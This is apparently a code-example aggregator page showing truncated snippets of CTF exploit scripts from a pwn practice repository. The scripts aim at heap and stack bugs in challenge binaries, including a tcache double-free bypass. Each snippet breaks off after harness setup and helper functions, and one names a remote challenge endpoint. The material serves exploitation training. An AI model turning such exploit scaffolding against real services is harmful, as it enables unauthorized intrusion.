#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_basei


def add(size, ):
    p.recvuntil("mand: ")
예제 #26
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for girlfriend, bypass double free check for tcache in glibc 2.29

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./chall")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug
# (the header comment above mentions glibc 2.29, so check which one is intended).
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def add(size, name, phone):
    p.recvuntil("choice:")
    p.sendline("1")
    p.recvuntil("girl's name")
예제 #27
from pwn_debug import *
import time
# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("pwn")
pdbg.context.terminal = ['tmux', 'splitw', '-h']  # tmux horizontal split for harness windows
# `context` is not defined in this snippet; presumably pwntools' context
# re-exported by the star import -- verify.
context.log_level = 'debug'
# Only "local" and "remote" are registered; no pdbg.debug(...) call is made, so
# switch==2 below presumably starts an unconfigured mode -- confirm. remote() is
# also called without an endpoint.
pdbg.local("")
pdbg.remote()

# Manual mode selector. There is no else branch: any value other than 1/2/3
# leaves `p` unbound and the helpers below fail with NameError.
switch = 1
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
# Thin wrappers over the global tube `p` and harness `pdbg` defined above. Every
# payload goes through str() so that ints can be passed directly.
def s(data):
    """Send `data` with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for `delim`, then send `data`."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for `delim`, then send `data` followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to `numb` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` is forwarded to recvuntil."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Right-pad `data` with NULs to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Right-pad `data` with NULs to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\x00'))


def bp(bkp):
    """Forward breakpoint spec `bkp` to the harness."""
    return pdbg.bp(bkp)


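def bpp(m=None):
    """Forward breakpoint list `m` (default: none) to the `bp` helper, then wait for a keypress.

    `m` defaults to None instead of a shared `[]` so that a mutation of the
    list by a caller or by pdbg.bp() cannot leak into later calls.
    """
    bp([] if m is None else m)
    # NOTE(review): under Python 2, input() evaluates the typed line as an
    # expression; raw_input() only reads it. Left unchanged because the
    # interpreter version this script targets is not visible here -- confirm,
    # and prefer raw_input() (or pwntools' pause()) if it is Python 2.
    input()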
예제 #28
# File: exp.py
# Author: raycp
# Date: 2019-05-21
# Description: exp for stackoverflow

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg=pwn_debug("stackoverflow")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Register all three run modes ("debug" with what is presumably a glibc version,
# "remote" with an endpoint); only "debug" is started -- confirm against pwn_debug.
pdbg.local()
pdbg.debug("2.24")
pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below
# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp=pdbg.membp
#print type(pdbg.membp)
#print pdbg.hh
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base

def malloc_one(size=0,data="",real_size=0,flag=False):
    p.recvuntil("flow: ")
    p.sendline(str(size))
예제 #29
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-06-08
# Description: exp for EasiestPrintf, trigger malloc by printf

from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above.
pdbg = pwn_debug("./EasiestPrintf")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal = ['tmux', 'splitw', '-h']

# Run-mode registration. Only the "debug" mode is configured and started here;
# "2.27" is presumably the glibc version it should use -- confirm against pwn_debug.
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p = pdbg.run("debug")  # tube to the started target; read by the functions below

# Harness views of the running process: membp carries elf_base/libc_base (see the
# commented print); elf/libc are presumably pwntools-style ELF objects -- verify.
membp = pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf = pdbg.elf
libc = pdbg.libc

#io_file=IO_FILE_plus()
#io_file.show()


def pwn():

    pdbg.bp(0x804881C)
    p.recvuntil("read:\n")
예제 #30
파일: exp.py 프로젝트: ray-cp/pwn_category
# File: exp.py
# Author: raycp
# Date: 2019-05-29
# Description: exp for babyheap

from pwn import *
from pwn_debug import *

# Harness for the target binary; pwn_debug comes from the star import above
# (this script also star-imports pwn directly, so names may come from either).
pdbg=pwn_debug("babyheap")

# Terminal command the harness uses for any window it opens: a horizontal tmux split.
pdbg.context.terminal=['tmux', 'splitw', '-h']

# Register all three run modes: "local" with a libc path, "debug" with what is
# presumably a glibc version, "remote" with an endpoint plus libc. Only "debug"
# is started -- confirm argument meaning against pwn_debug.
pdbg.local("./libc-2.23.so")
pdbg.debug("2.23")
pdbg.remote('123.206.174.203', 20001,"./libc-2.23.so")
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")  # tube to the started target; read by the functions below

# membp is deliberately left unread here (commented out); only the ELF/libc
# objects are kept -- presumably pwntools-style, verify.
#membp=pdbg.membp
#print type(pdbg.membp)
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#a=IO_FILE_plus()
#print a
#a.show()
#print a._IO_read_base

def add(size):
    p.recvuntil("Choice: ")